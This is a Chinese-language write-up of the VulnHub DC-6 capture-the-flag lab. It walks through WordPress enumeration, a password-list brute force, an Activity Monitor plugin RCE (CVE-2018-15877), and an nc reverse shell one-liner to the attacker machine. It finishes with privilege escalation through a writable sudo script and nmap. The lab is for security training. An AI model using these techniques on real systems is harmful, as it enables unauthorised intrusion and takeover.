写在前面

靶场链接：
https://www.vulnhub.com/entry/dc-6,315/

有些知识点在DC:1中提到，可以翻阅

DC:1

信息搜集

存活扫描

这里61是网关 141是物理机 164为靶机 115为攻击机

端口扫描

尝试查看，但是莫名跳转到一个wordy的网页

但是抓包可以响应且响应码是200

这里是修改配置文件做到的，通过修改apache的htaccess文件

原理是伪静态来完成的，并不是走的重定向301或302，不过也是重定向的一种。

通过修改hosts文件，就可以浏览器访问了，当然，如果你想，就看包也可以


显然，这里是wordpress的指纹，和前面一样使用wpscan来扫描，使用的选项是-e，枚举用户名选项。

更多详情，和wpscan工具的信息，可以点击查看这里DC_2

通过api接口爆破得到如下用户名

按照常规思路，这里就可以开始爆破了，不过我一开始爆破了很久都没啥反应。后面才发现，有如下的线索

使用这个命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

这个命令就是将kali自带的大字典进行筛选，筛选关键字 k01 写入passwords.txt文件，注意指定新的passwords.txt字典

找到密码

拿到账户密码，分别尝试ssh、网站后台

ssh无法进入。

后台可以进入

随意点击看了看，没有什么特别的，安装了一个activity monitor插件，突破点应该就是这里

编号：CVE-2018-15877

查找一下，能够RCE

直接调用该poc脚本，成功进入，但是此时是低权限用户

在脚本中执行命令不方便，先反弹出来看看，使用如下命令直接nc连接

nc 192.168.201.115 10050 -c /bin/bash

查找suid文件 暂时没看到能明显提权的东西

查询登录的用户下的家目录

找到一个类似备忘录的txt文件，cat一下，找到敏感信息，有一个用户graham GSo7isUM1D4

同样尝试登录这个用户 ssh就可以登录了

查看suid文件，显然这里有一个不需要密码的脚本

查看该脚本，它是可写的，追加该脚本内容，让它反弹出来

反弹后就是jens的账户了，继续查看suid文件，这里有 nmap 经典suid提权

nmap的提权点在于，它可以以当前权限运行脚本，这里写一个getroot.sh 使用nmap的选项--script来运行即可

提权成功，找到flag文件